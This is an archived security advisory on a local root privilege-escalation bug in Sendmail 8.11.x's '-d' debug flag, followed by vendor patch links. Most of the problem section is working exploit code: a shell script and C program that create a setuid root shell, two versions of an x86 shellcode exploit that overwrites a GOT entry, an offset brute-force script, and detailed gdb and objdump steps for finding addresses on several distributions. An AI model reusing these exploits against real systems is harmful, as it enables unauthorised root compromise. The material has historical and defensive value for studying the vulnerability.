COMMAND
Sendmail
SYSTEMS AFFECTED
Sendmail 8.12beta7, 8.12beta5, 8.12beta16, 8.12beta12, 8.12beta10, 8.11.5, 8.11.4, 8.11.3, 8.11.2, 8.11.1, 8.11
PROBLEM
This alert has been posted to Bugtraq as our public release of the
vulnerability discovered in Sendmail by Cade Cairns. Sendmail
contains an input validation error, may lead to the execution of
arbitrary code with elevated privileges. Local users may be able
to write arbitrary data to process memory, possibly allowing the
execution of code/commands with elevated privileges.
An input validation error exists in Sendmail's debugging
functionality. The problem is the result of the use of signed
integers in the program's tTflag() function, which is responsible
for processing arguments supplied from the command line with the
'-d' switch and writing the values to it's internal "trace
vector." The vulnerability exists because it is possible to cause
a signed integer overflow by supplying a large numeric value for
the 'category' part of the debugger arguments. The numeric value
is used as an index for the trace vector.
Before the vector is written to, a check is performed to ensure
that the supplied index value is not greater than the size of the
vector. However, because a signed integer comparison is used, it
is possible to bypass the check by supplying the signed integer
equivalent of a negative value. This may allow an attacker to
write data to anywhere within a certain range of locations in
process memory.
Because the '-d' command-line switch is processed before the
program drops its elevated privileges, this could lead to a
full system compromise. This vulnerability has been successfully
exploited in a laboratory environment.
An attacker with local access must determine the memory offsets
of the program's internal tTdvect variable and the location to
which he or she wishes to have data written.
The attacker must craft in architecture specific binary code the
commands (or 'shellcode') to be executed with higher privilege.
The attacker must then run the program, using the '-d' flag to
overwrite a function return address with the location of the
supplied shellcode.
Following is a simple slack sendmail exploit (rh 7.1 offset
also included) it's so funny to see an old bug striking again...
GEN:
====
TMPDIR=/tmp/sx1
SHELL=/bin/bash
EXECUTABLE=$TMPDIR/owned
cp -f /bin/bash $TMPDIR/sushi
umask 022
mkdir -p $TMPDIR
chmod 777 $TMPDIR
cat <<_MUX_ >/tmp/x
O QueueDirectory=$TMPDIR
O ForwardPath=/no_forward_file
S0
R\$* \$#local \$: \$1
Mlocal, P=$EXECUTABLE, F=lsDFMAw5:/|@qSPfhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
T=DNS/RFC822/X-Unix, A=$EXECUTABLE
_MUX_
XPL:
====
#!/bin/bash
./gen
gcc -o /tmp/sx1/owned owned.c
gcc -o sxpl xp.c
./sxpl
ls -la /tmp/sushi
OWNED.C:
========
int main()
{
setuid(0);
setgid(0);
chown("/tmp/sushi", 0, 0);
chmod("/tmp/sushi", 04755);
}
XP.C:
=====
/*
simple sendmail -d pokes generator by LucySoft.
default offsets for slack 7.0 sendmail 8.11.2
redhat linux 7.1 address = 0x080ca160
in order to get offsets for sendmail you should look for some code like the following
./sendmail/trace.c
....
0x8080688 <tTflag+196>: mov 0x80b21f8,%edi
0x808068e <tTflag+202>: dec %edi
0x808068f <tTflag+203>: mov %edi,0xfffffff8(%ebp)
0x8080692 <tTflag+206>: jmp 0x808069d <tTflag+217>
0x8080694 <tTflag+208>: mov 0x80b21f4,%eax
^^^^^^^^^^^
this is the ConfFile ptr that will be overwritten
to point to the beginning of the debug array
after you found this, in gdb just x/4x 0x802b1f4
and you got the address...
redhat has stripped exe, and the machine code is using
different registers, but it's a piece of cake to find this
objdump -d /usr/sbin/sendmail > sm.asm and then search for
something like this
mov %cl,(%edi,%eax,1)
0x8080699 <tTflag+213>: mov %bl,(%esi,%eax,1)
0x808069c <tTflag+216>: inc %esi
0x808069d <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
0x80806a0 <tTflag+220>: jle 0x8080694 <tTflag+208>
0x80806a2 <tTflag+222>: mov (%edx),%al
0x80806a4 <tTflag+224>: inc %edx
0x80806a5 <tTflag+225>: test %al,%al
.......
*/
#include <stdio.h>
char* strcf = "/tmp/x";
char str[1000];
char tmp[100];
char* user="root";
unsigned long ConfFile = 0x80b9ae0;
unsigned long offset = 19816;
int main(int argc, char* argv[])
{
int k, shift;
unsigned long a, ax;
k = 1;
while (k < argc)
{
if ((!strncmp(argv[k], "-offset")) && (k + 1 < argc))
{
offset = atol(argv[k+1]);
printf("* offset=%d\n", offset);
k += 2;
continue;
}
if ((!strncmp(argv[k], "-address")) && (k + 1 < argc))
{
sscanf(argv[k + 1], "%lx", &ConfFile);
printf("* address=%x\n", ConfFile);
k += 2;
continue;
}
k++;
}
strcpy(str, "echo | /usr/sbin/sendmail ");
for (k = 0; (k < strlen(strcf)) && (k < 100); k++)
{
sprintf(tmp, "-d%d.%d ", k, strcf[k]);
strcat(str, tmp);
}
shift = 0;
for (k = 0; k < 4; k++)
{
a = ((unsigned long)ConfFile >> shift) & 0x000000ff;
ax = 4294967295 - offset + k + 1;
sprintf(tmp, "-d%lu.%d ", ax, a);
strcat(str, tmp);
shift += 8;
}
strcat(str, user);
strcat(str, "\n");
printf(str);
system(str);
printf("you should have /tmp/sushi suid if everything worked fine...\n");
}
Here's an another sendmail exploit for linux x86:
/*
* alsou.c
*
* sendmail-8.11.x linux x86 exploit
*
* To use this exploit you should know two numbers: VECT and GOT.
* Use gdb to find the first:
*
* $ gdb -q /usr/sbin/sendmail
* (gdb) break tTflag
* Breakpoint 1 at 0x8080629
* (gdb) r -d1-1.1
* Starting program: /usr/sbin/sendmail -d1-1.1
*
* Breakpoint 1, 0x8080629 in tTflag ()
* (gdb) disassemble tTflag
* .............
* 0x80806ea <tTflag+202>: dec %edi
* 0x80806eb <tTflag+203>: mov %edi,0xfffffff8(%ebp)
* 0x80806ee <tTflag+206>: jmp 0x80806f9 <tTflag+217>
* 0x80806f0 <tTflag+208>: mov 0x80b21f4,%eax
* ^^^^^^^^^^^^^^^^^^ address of VECT
* 0x80806f5 <tTflag+213>: mov %bl,(%esi,%eax,1)
* 0x80806f8 <tTflag+216>: inc %esi
* 0x80806f9 <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
* 0x80806fc <tTflag+220>: jle 0x80806f0 <tTflag+208>
* .............
* (gdb) x/x 0x80b21f4
* 0x80b21f4 <tTvect>: 0x080b9ae0
* ^^^^^^^^^^^^^ VECT
*
* Use objdump to find the second:
* $ objdump -R /usr/sbin/sendmail |grep setuid
* 0809e07c R_386_JUMP_SLOT setuid
* ^^^^^^^^^ GOT
*
* Probably you should play with OFFSET to make exploit work.
*
* Constant values, written in this code found for sendmail-8.11.4
* on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
* GOT = 0x0809e07c.
*
* To get r00t type ./alsou and then press Ctrl+C.
*
*
* grange <grange@rt.mipt.ru>
*
*/
#include <sys/types.h>
#include <stdlib.h>
#define OFFSET 1000
#define VECT 0x080baf20
#define GOT 0x0809f544
#define NOPNUM 1024
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *egg, s[256], tmp[256], *av[3], *ev[2];
unsigned int got = GOT, vect = VECT, ret, first, last, i;
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, NOPNUM);
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
ret = get_esp() + OFFSET;
sprintf(s, "-d");
first = -vect - (0xffffffff - got + 1);
last = first;
while (ret) {
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = '\0';
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
ev[0] = egg;
ev[1] = NULL;
execve(*av, av, ev);
}
Following is the 'alsou.c' sendmail 8.11.x (x<=5) xploit with
some very slight modifications:
- extensive documentation and example on how to get this to work
on several distros / sendmail versions=20
- working on default SuSE 7.2 (sendmail 8.11.3):
- also included working parameters for SuSE 6.4 with *custom
compiled* sendmail 8.11.2:
- allows to give offset in command line. Use with 'smxploit'
script (also included) in order to find correct offset. This
will be necessary in different distros / sendmail versions
- QUICK GUIDE for finding propper exploitation values (VECT, GOT
and OFFSET):
==> CASE A: Non-stripped binary:
==> CASE B: Stripped binary (this is the default on several
distros)
SMXPLOIT:
#!/bin/bash
# by RoMaNSoFt <roman@deathsdoor.com>
# 24.08.2001
OFFSET=$1
echo "Trying from $1 to $2 incrementing by $3"
while [ $OFFSET -le $2 ] ; do
./alsou2 $OFFSET
OFFSET=`expr $OFFSET + $3`
done
------------------------------------------------------------------
ALSOU2.C:
/*
* alsou2.c
*
* This is the 'alsou.c' sendmail 8.11.x xploit with some very slight modifications:
*
* - extensive documentation and example on how to get this to work on several distros / sm versions
* - working on default SuSE 7.2 (sendmail 8.11.3):
*
* roman@stuka:~ > gcc -o alsou2 alsou2.c
* roman@stuka:~ > ./alsou2
* Offset=2500
* Recipient names must be specified
* <ctrl-c>
* sh-2.05#
*
* - also included working parameters for SuSE 6.4 with *custom compiled* sendmail 8.11.2:
*
* [change the #define lines: comment and uncomment the corresponding lines]
* roman@emilio:~ > gcc -o alsou2 alsou2.c
* roman@emilio:~ > ./alsou2
* Offset=1500
* Recipient names must be specified
* <ctrl-c>
* sh-2.03#
*
* - allows to give offset in command line. Use with 'smxploit' script in order to find correct offset.
* This will be necessary in different distros / sendmail versions to find VECT, GOT and OFFSET parameters.
* Please read carefully the following section.
*
*
* QUICK GUIDE for finding propper exploitation values
* ===================================================
*
* ==> CASE A: Non-stripped binary:
*
* 1.- Find VECT and GOT using gdb (as explained in alsou.c original comments). Note that you cannot directly
* debug /usr/sbin/sendmail being setuid by root from a non-root account. In this case you'll simply have to:
* $ cp /usr/sbin/sendmail /tmp/sendmail
* $ gdb -q /tmp/sendmail
* ...
*
* (thanks to grange for the tip)
*
* 2.- Use 'smxploit' script to find the offset:
*
* [modify source and include VECT and GOT values found on step one]
* roman@emilio:~ > gcc -o alsou2 alsou2.c
* roman@emilio:~ > ./smxploit 500 3500 1000
* Trying from 500 to 3500 incrementing by 1000
* Offset=500
* Recipient names must be specified
* <ctrl-c>
* ./smxploit: line 10: 31767 Violación de segmento ./alsou2 $OFFSET
* Offset=1500
* Recipient names must be specified
* <ctrl-c>
* sh-2.03#
*
* You'll have to press ctrl-c several times. Yes, this could be improved... but do it by yourself :-)
*
*
* ==> CASE B: Stripped binary (this is the default on several distros):
*
* 1.- Find VECT and GOT:
*
* roman@stuka:~ > id
* uid=501(roman) gid=100(users) grupos=100(users)
* roman@stuka:~ > cp /usr/sbin/sendmail /tmp/sendmail
* roman@stuka:~ > objdump -d /tmp/sendmail >sm
* objdump: /tmp/sendmail: no symbols
*
* [first we try:]
* roman@stuka:~ > grep "mov.*%.*,(%.*,%.*,1)" sm | wc -l
* 88
* [too many found mov's but anyway:]
* roman@stuka:~ > grep -A 1 -B 1 "mov.*%.*,(%.*,%.*,1)" sm | less
* ...
* --
* 8095f53: a1 80 1a 17 08 mov 0x8171a80,%eax
* ^^^^^^^ ^^^^^^^^^
* 8095f58: 88 1c 06 mov %bl,(%esi,%eax,1)
* 8095f5b: 46 inc %esi
* -
* ...
* [we've determined that we can set the breakpoint at 0x8095f53 and do the x/x 0x8171a80]
*
* [another possible way:]
* roman@stuka:~ > grep "mov.*%.l,(%e.i,%eax,1)" sm
* 8095f58: 88 1c 06 mov %bl,(%esi,%eax,1)
* 811a212: 88 14 07 mov %dl,(%edi,%eax,1)
* 811dcf4: 88 0c 06 mov %cl,(%esi,%eax,1)
* [and now we have only three possible mov's ;-)]
*
* roman@stuka:~ > gdb -q /tmp/sendmail
* (no debugging symbols found)...(gdb) break *0x8095f53
* Breakpoint 1 at 0x8095f53
* (gdb) r -d1-1.1
* Starting program: /tmp/sendmail -d1-1.1
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...(no debugging symbols found)...
* (no debugging symbols found)...
* Breakpoint 1, 0x8095f53 in getopt ()
* (gdb) x/x 0x8171a80
* 0x8171a80 <stdin+82400>: 0x0817cec0
* ^^^^^^^^^^
* [so we have VECT=0x0817cec0]
* (gdb) quit
* The program is running. Exit anyway? (y or n) y
* roman@stuka:~ > objdump -R /tmp/sendmail | grep setuid
* 0815d358 R_386_JUMP_SLOT setuid
* ^^^^^^^^
* [so GOT=0x0815d358]
* roman@stuka:~ >
* [now we re-compile this source with a default OFFSET=1000]
*
* 2.- Find OFFSET:
*
* roman@stuka:~ > ./smxploit 500 3500 1000
* Trying from 500 to 3500 incrementing by 1000
* Offset=500
* Recipient names must be specified
* <ctrl-c>
* ./smxploit: line 10: 27273 Violacisn de segmento ./alsou2 $OFFSET
* Offset=1500
* Recipient names must be specified
* <ctrl-c>
* ./smxploit: line 10: 27275 Violacisn de segmento ./alsou2 $OFFSET
* Offset=2500
* Recipient names must be specified
* <ctrl-c>
* sh-2.05#
* [so we have OFFSET=2500. And we're r00t :-)]
*
*
* RoMaNSoFt <roman@deathsdoor.com>
* Spain, 26.08.2001
*
* ---------------------------------------------
* [ Original alsou.c comments ]
*
* sendmail-8.11.x linux x86 exploit
*
* To use this exploit you should know two numbers: VECT and GOT.
* Use gdb to find the first:
*
* $ gdb -q /usr/sbin/sendmail
* (gdb) break tTflag
* Breakpoint 1 at 0x8080629
* (gdb) r -d1-1.1
* Starting program: /usr/sbin/sendmail -d1-1.1
*
* Breakpoint 1, 0x8080629 in tTflag ()
* (gdb) disassemble tTflag
* .............
* 0x80806ea <tTflag+202>: dec %edi
* 0x80806eb <tTflag+203>: mov %edi,0xfffffff8(%ebp)
* 0x80806ee <tTflag+206>: jmp 0x80806f9 <tTflag+217>
* 0x80806f0 <tTflag+208>: mov 0x80b21f4,%eax
* ^^^^^^^^^^^^^^^^^^ address of VECT
* 0x80806f5 <tTflag+213>: mov %bl,(%esi,%eax,1)
* 0x80806f8 <tTflag+216>: inc %esi
* 0x80806f9 <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
* 0x80806fc <tTflag+220>: jle 0x80806f0 <tTflag+208>
* .............
* (gdb) x/x 0x80b21f4
* 0x80b21f4 <tTvect>: 0x080b9ae0
* ^^^^^^^^^^^^^ VECT
*
* Use objdump to find the second:
* $ objdump -R /usr/sbin/sendmail |grep setuid
* 0809e07c R_386_JUMP_SLOT setuid
* ^^^^^^^^^ GOT
*
* Probably you should play with OFFSET to make exploit work.
*
* Constant values, written in this code found for sendmail-8.11.4
* on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
* GOT = 0x0809e07c.
*
* To get r00t type ./alsou and then press Ctrl+C.
*
*
* grange <grange@rt.mipt.ru>
*
*/
#include <sys/types.h>
#include <stdlib.h>
/* SuSE 7.2 Default (sendmail 8.11.3) */
#define OFFSET 2500
#define VECT 0x0817cec0
#define GOT 0x0815d358
/* SuSE 6.4 with (custom) sendmail 8.11.2
* (note SuSE 6.4 *default* is not vulnerable because it ships sendmail 8.9.3 which is not vulnerable) */
// #define OFFSET 1500
// #define VECT 0x080bdbe0
// #define GOT 0x080a2200
/* RedHat 6.2 with sendmail 8.11.4 */
// #define OFFSET 1000
// #define VECT 0x080baf20
// #define GOT 0x0809f544
#define NOPNUM 1024
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *egg, s[256], tmp[256], *av[3], *ev[2];
unsigned int got = GOT, vect = VECT, ret, first, last, i, offset;
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, NOPNUM);
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
if(argc > 1)
offset = atoi(argv[1]);
else
offset = OFFSET;
printf("Offset=%d\n", offset);
ret = get_esp() + offset;
sprintf(s, "-d");
first = -vect - (0xffffffff - got + 1);
last = first;
while (ret) {
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = '\0';
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
ev[0] = egg;
ev[1] = NULL;
execve(*av, av, ev);
}
SOLUTION
This vulnerability, present in sendmail open source versions
between 8.11.0 and 8.11.5 has been corrected in 8.11.6. sendmail
8.12.0.Beta users should upgrade to 8.12.0.Beta19. The problem
was not present in 8.10 or earlier versions. However, as always,
we recommend using the latest version. Note that this problem is
not remotely exploitable. Additionally, sendmail 8.12 will no
longer uses a set-user-id root binary by default. Updated
packages that rectify this issue are available from the vendor:
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For SuSE:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/sendmail-8.11.3-68.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.2/sec2/sendmail-tls-8.11.3-72.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sendmail-8.11.3-68.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/sendmail-8.11.2-34.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/sec2/sendmail-tls-8.11.2-29.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sendmail-8.11.2-34.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/sendmail-8.11.0-5.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/sendmail-8.11.0-5.src.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/n1/sendmail-8.11.2-17.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/sec2/sendmail-tls-8.11.2-16.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/sendmail-8.11.2-17.src.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/n1/sendmail-8.11.0-3.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/sendmail-8.11.0-3.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/sendmail-8.11.2-19.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/sec2/sendmail-tls-8.11.2-21.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/sendmail-8.11.2-19.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/sendmail-8.11.2-23.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/sec2/sendmail-tls-8.11.2-21.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/sendmail-8.11.2-23.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/sendmail-8.11.0-33.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/sendmail-8.11.0-33.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_1cl.i386.rpm
For Immunix OS:
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/sendmail-8.11.6-1_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/sendmail-cf-8.11.6-1_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/sendmail-doc-8.11.6-1_imnx.i386.rpm
For Caldera:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS
RPMS/sendmail-8.11.1-4.i386.rpm
RPMS/sendmail-cf-8.11.1-4.i386.rpm
RPMS/sendmail-doc-8.11.1-4.i386.rpm
SRPMS/sendmail-8.11.1-4.src.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS
RPMS/sendmail-8.11.1-4.i386.rpm
RPMS/sendmail-cf-8.11.1-4.i386.rpm
RPMS/sendmail-doc-8.11.1-4.i386.rpm
SRPMS/sendmail-8.11.1-4.src.rpm